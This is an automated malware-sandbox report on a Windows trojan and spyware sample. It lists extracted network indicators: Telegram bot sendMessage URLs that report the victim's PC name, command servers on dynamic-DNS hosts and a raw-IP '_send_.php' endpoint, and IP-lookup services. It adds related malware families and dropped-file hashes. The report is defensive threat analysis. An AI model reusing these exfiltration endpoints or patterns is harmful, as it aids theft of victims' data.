                                                        http://www.sajatypeworks.comfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.typography.netDfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.founder.com.cn/cn/cThefile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.galapagosdesign.com/staff/dennis.htmfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20afile.exe, 00000002.00000002.4144889269.0000000003176000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installfile.exe, 00000002.00000002.4148149933.0000000004178000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004414000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000041C2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.000000000414D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.000000000431C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000042F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://checkip.dyndns.org/qfile.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://chrome.google.com/webstore?hl=enlBfile.exe, 00000002.00000002.4144889269.000000000324E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.galapagosdesign.com/DPleasefile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.fonts.comfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.sandoll.co.krfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.urwpp.deDPleasefile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.zhongyicts.com.cnfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000002.00000002.4144889269.0000000003091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.sakkal.comfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://reallyfreegeoip.org/xml/file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.office.com/file.exe, 00000002.00000002.4144889269.0000000003284000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003275000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.000000000319A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.apache.org/licenses/LICENSE-2.0file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.fontbureau.comfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://upx.sf.netAmcache.hve.5.drfalse
                                                                                                		high
                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016file.exe, 00000002.00000002.4148149933.0000000004316000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000041E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004364000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.000000000319A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000041C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=file.exe, 00000002.00000002.4144889269.0000000003176000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.carterandcone.comlfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://aborters.duckdns.org:8081file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.fontbureau.com/designers/cabarga.htmlNfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.founder.com.cn/cnfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.fontbureau.com/designers/frere-user.htmlfile.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://anotherarmy.dns.army:8081file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.jiyu-kobo.co.jp/file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://reallyfreegeoip.org/xml/8.46.123.189$file.exe, 00000002.00000002.4144889269.0000000003176000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003150000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.000000000310B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://reallyfreegeoip.orgfile.exe, 00000002.00000002.4144889269.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003176000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003150000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.fontbureau.com/designers8file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesfile.exe, 00000002.00000002.4148149933.0000000004178000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004414000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000041C2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.000000000414D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.000000000431C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000042F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedfile.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                            		high

                                                                                                                            World Map of Contacted IPs

                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs

                                                                                                                            Public IPs

                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            149.154.167.220
                                                                                                                            		api.telegram.orgUnited Kingdom
                                                                                                                            		62041TELEGRAMRUfalse
                                                                                                                            193.122.6.168
                                                                                                                            		checkip.dyndns.comUnited States
                                                                                                                            		31898ORACLE-BMC-31898USfalse
                                                                                                                            188.114.96.3
                                                                                                                            		reallyfreegeoip.orgEuropean Union
                                                                                                                            		13335CLOUDFLARENETUSfalse

                                                                                                                            General Information

                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                            Analysis ID:1582677
                                                                                                                            Start date and time:2024-12-31 09:14:06 +01:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 7m 52s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                            Number of analysed new started processes analysed:10
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:0
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Sample name:file.exe
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@4/6@3/3
                                                                                                                            EGA Information:
                                                                                                                            • Successful, ratio: 50%
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 99%
                                                                                                                            • Number of executed functions: 79
                                                                                                                            • Number of non-executed functions: 8
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                            Warnings

                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                            • Excluded IPs from analysis (whitelisted): 13.89.179.12, 20.190.159.68, 184.28.90.27, 52.149.20.212, 13.107.246.45
                                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                            • Execution Graph export aborted for target file.exe, PID 7692 because it is empty
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                            Simulations

                                                                                                                            Behavior and APIs

                                                                                                                            TimeTypeDescription
                                                                                                                            03:14:58API Interceptor9347183x Sleep call for process: file.exe modified
                                                                                                                            03:15:12API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                            Joe Sandbox View / Context

                                                                                                                            IPs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            149.154.167.220XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                              Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                                                  Flasher.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                                                                                                                    i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                                      INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                        cMTqzvmx9u.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                                                                                                                                          Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                              Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                193.122.6.168INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • checkip.dyndns.org/
                                                                                                                                                Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                • checkip.dyndns.org/
                                                                                                                                                HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • checkip.dyndns.org/
                                                                                                                                                EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • checkip.dyndns.org/
                                                                                                                                                Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • checkip.dyndns.org/
                                                                                                                                                HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • checkip.dyndns.org/
                                                                                                                                                YU SV Payment.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • checkip.dyndns.org/
                                                                                                                                                PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                • checkip.dyndns.org/
                                                                                                                                                PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                • checkip.dyndns.org/
                                                                                                                                                Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                • checkip.dyndns.org/

                                                                                                                                                Domains

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                reallyfreegeoip.orgPO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 188.114.97.3
                                                                                                                                                Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 172.67.177.134
                                                                                                                                                Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                • 172.67.177.134
                                                                                                                                                HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 172.67.177.134
                                                                                                                                                EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 172.67.177.134
                                                                                                                                                Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                • 104.21.67.152
                                                                                                                                                checkip.dyndns.comPO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 132.226.8.169
                                                                                                                                                PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 193.122.130.0
                                                                                                                                                Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 132.226.247.73
                                                                                                                                                ZOYGRL1ePa.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                                                                                                • 158.101.44.242
                                                                                                                                                Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                • 132.226.247.73
                                                                                                                                                INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 193.122.6.168
                                                                                                                                                Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                • 193.122.6.168
                                                                                                                                                HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 193.122.6.168
                                                                                                                                                EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 193.122.6.168
                                                                                                                                                Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 193.122.6.168
                                                                                                                                                api.telegram.orgXClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                Flasher.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                • 149.154.167.220

                                                                                                                                                ASNs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                ORACLE-BMC-31898USPO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 193.122.130.0
                                                                                                                                                ZOYGRL1ePa.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                                                                                                • 158.101.44.242
                                                                                                                                                INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 193.122.6.168
                                                                                                                                                armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 129.148.142.134
                                                                                                                                                Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                • 193.122.6.168
                                                                                                                                                HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 193.122.6.168
                                                                                                                                                splm68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                • 129.147.168.111
                                                                                                                                                EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 193.122.6.168
                                                                                                                                                Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 193.122.6.168
                                                                                                                                                HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 193.122.6.168
                                                                                                                                                TELEGRAMRUXClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 149.154.167.99
                                                                                                                                                Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 149.154.167.99
                                                                                                                                                iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                Flasher.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 149.154.167.99
                                                                                                                                                https://linkenbio.net/59125/247Get hashmaliciousUnknownBrowse
                                                                                                                                                • 149.154.167.99
                                                                                                                                                aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 149.154.167.99
                                                                                                                                                installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                • 149.154.167.99
                                                                                                                                                CLOUDFLARENETUSPO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                DIS_37745672.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                                                                • 104.17.247.203
                                                                                                                                                Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                • 188.114.97.3
                                                                                                                                                https://nutricarm.es/wp-templates/f8b83.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.21.96.1
                                                                                                                                                Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 172.67.157.254
                                                                                                                                                RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                • 104.26.12.205
                                                                                                                                                http://ghostbin.cafe24.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                • 104.18.27.193
                                                                                                                                                http://parrottalks.infoGet hashmaliciousUnknownBrowse
                                                                                                                                                • 1.1.1.1
                                                                                                                                                https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                                                                                                • 104.17.208.240
                                                                                                                                                Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                • 162.159.138.232

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                54328bd36c14bd82ddaa0c04b25ed9adPO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                3b5074b1b5d032e5620f69f9f700ff0ePoket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                Epsilon.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                hoEtvOOrYH.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                Supplier.batGet hashmaliciousUnknownBrowse
                                                                                                                                                • 149.154.167.220
                                                                                                                                                Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • 149.154.167.220

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_c5a23b0a5bec8cf71c991d5ea2e433b1abfb071_050d1119_af2d4d7b-1273-4fcd-b0e6-297b868de3e0\Report.wer

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):65536
                                                                                                                                                Entropy (8bit):1.123563711576858
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:RTGWgIBJCvpOy0A0BU/fIxaWOJoNZrMbzuiF7Z24IO8qB1:zgaSw7BU/iaxbzuiF7Y4IO861
                                                                                                                                                MD5:E034125D21B49A328F7C72FB429222D8
                                                                                                                                                SHA1:D9FA6223D97182A8C335373E1E8B26A377052BA7
                                                                                                                                                SHA-256:995838C1EF4BAE9AC119F351EB1AFC9012DF7F77C1CD667AC621E904C586320B
                                                                                                                                                SHA-512:608D3C07CDF36263CA971EB378EEC402FFB4030F2AB089D0776E104B53CA1D42E3FF941F09E02A0A98206514F0D733E426B53AD4AA8A1BE470B692BB657AD1DA
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.1.0.6.5.0.0.5.9.1.7.1.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.1.0.6.5.0.1.2.0.1.0.7.5.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.2.d.4.d.7.b.-.1.2.7.3.-.4.f.c.d.-.b.0.e.6.-.2.9.7.b.8.6.8.d.e.3.e.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.0.2.1.0.f.5.b.-.f.3.a.b.-.4.0.d.b.-.8.c.e.e.-.f.3.d.5.9.0.c.3.7.b.d.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.z.o.B.x...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.9.0.-.0.0.0.1.-.0.0.1.4.-.5.6.8.b.-.6.b.1.4.5.c.5.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.3.a.b.0.7.8.a.6.d.b.a.6.7.3.f.7.f.d.4.4.2.e.8.4.2.7.c.4.e.b.0.0.0.0.0.0.0.0.!.0.0.0.0.8.5.0.d.b.9.2.a.1.a.e.a.8.c.8.a.7.b.a.5.a.9.4.0.c.9.f.9.a.b.1.9.c.3.1.c.e.9.a.4.!.f.i.l.e...

                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERB432.tmp.dmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Tue Dec 31 08:15:00 2024, 0x1205a4 type
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):309199
                                                                                                                                                Entropy (8bit):3.9991454966192643
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:UtKg4SB4lxc4uEqsyCLTgo7NWxiy2OMNXUsU0iSxL3qs5:UtKnzc4RywTgZx+uSh
                                                                                                                                                MD5:25896F89B2E070E18D1D0F4407AF5AE8
                                                                                                                                                SHA1:23A217DB9A60C9F2B2FF565078BB2CBCE7044F60
                                                                                                                                                SHA-256:D257D9358B274F1B16D886204E0ABB4318DCAC3FBE6D8AC3D195A853A673208C
